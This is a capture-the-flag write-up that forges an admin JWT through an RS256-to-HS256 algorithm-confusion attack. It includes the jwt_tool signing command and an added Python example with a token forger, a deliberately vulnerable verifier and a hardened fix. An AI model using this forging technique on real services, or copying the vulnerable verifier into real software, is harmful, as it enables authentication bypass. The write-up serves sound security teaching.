Narek Babajanyan
SecurityBoat June CTF solution

SecurityBoat posted the following CTF challenge on their Twitter account.

The challenge was to get to the admin dashboard and retrieve the flag. Initial credentials were provided on the login screen.

Upon logging in, we see two cookies being returned from the server: auth and pubkey.

Server response headers

The auth cookie is clearly a JWT, so we can use a tool like jwt.io to inspect its contents.

JWT contents

Notably, the token is signed with RS256 (an asymmetric signature algorithm) and carries a role field in its payload.

Upon logging in, we are redirected to http://ctf.securityboat.in:4000/jwt/user/home.php.

With all that said, our likely attack methodology is the following:

  • Replace the user value with admin within the role field of the token,
  • Find a way to sign the token,
  • Using the token, navigate to http://ctf.securityboat.in:4000/jwt/admin/home.php

Since we know the public key used for the RS256 signature, we can attempt an algorithm confusion attack. This type of attack takes advantage of inexact token handling on the backend: the alg field in the token header is replaced with HS256 and the exposed public key is used as the HMAC key, so a backend that trusts the header's alg and reuses the same key material for every algorithm will accept the forged signature. We can use jwt.io to modify the necessary fields (role and alg) and sign the token with JWT_Tool.

The command to do so looks like the following:

python3 jwt_tool.py INSERT_MODIFIED_TOKEN_HERE -S hs256 -k public_key.pem

...where public_key.pem is the file containing the RSA public key returned by the server during the initial login (make sure to URL-decode the key before saving it).
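Why the backend accepts that token, and what the fix looks like, as an added example that is not part of this writeup or of SecurityBoat's challenge code: the first verifier below reproduces the flawed pattern (trusting the header's alg and reusing one key blob for every algorithm), while the hardened variant pins the algorithm server-side and refuses PEM material as an HMAC secret. The public key bytes are a constructed placeholder, not a real key.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the key served in the pubkey cookie; any bytes will do,
# because the flaw is that these bytes are accepted as an HMAC secret.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nCONSTRUCTED-DEMO-KEY-NOT-REAL\n-----END PUBLIC KEY-----\n"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def forge_hs256(payload: dict, key: bytes) -> str:
    """Test fixture: the kind of HS256 token jwt_tool produced in the writeup."""
    h = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    p = b64url(json.dumps(payload).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"

def verify_vulnerable(token: str, key_material: bytes) -> dict:
    """Flawed pattern: the attacker-controlled header decides which algorithm runs."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "HS256":
        mac = hmac.new(key_material, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(mac, b64url_decode(s)):
            raise ValueError("bad signature")
        return json.loads(b64url_decode(p))
    if alg == "RS256":
        raise NotImplementedError("RSA verification needs a crypto library; not exercised here")
    raise ValueError(f"unsupported alg {alg!r}")

def verify_hardened(token: str, key_material: bytes, expected_alg: str = "RS256") -> dict:
    """Fix: pin the algorithm in server config and never feed PEM material to HMAC."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg != expected_alg:
        raise ValueError(f"rejected: header alg {alg!r}, server expects {expected_alg!r}")
    if alg == "HS256" and key_material.lstrip().startswith(b"-----BEGIN"):
        raise ValueError("rejected: PEM-encoded key offered as HMAC secret")
    return verify_vulnerable(token, key_material)  # alg already matches the pinned one

def accepts(verifier, token: str, key: bytes) -> bool:
    """True when the verifier returns a payload, False when it rejects the token."""
    try:
        verifier(token, key)
        return True
    except (ValueError, NotImplementedError):
        return False
```

Running `accepts(verify_vulnerable, forge_hs256({"role": "admin"}, PUBLIC_KEY_PEM), PUBLIC_KEY_PEM)` returns True, the same outcome the admin page showed; the hardened verifier rejects the token at the alg check before any signature is computed.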

After JWT_Tool returns the tampered token, we can use Chrome to modify the cookies within the current session:

Modifying cookies with Chrome

After navigating to http://ctf.securityboat.in:4000/jwt/admin/user.php, we get the flag.

Victory!
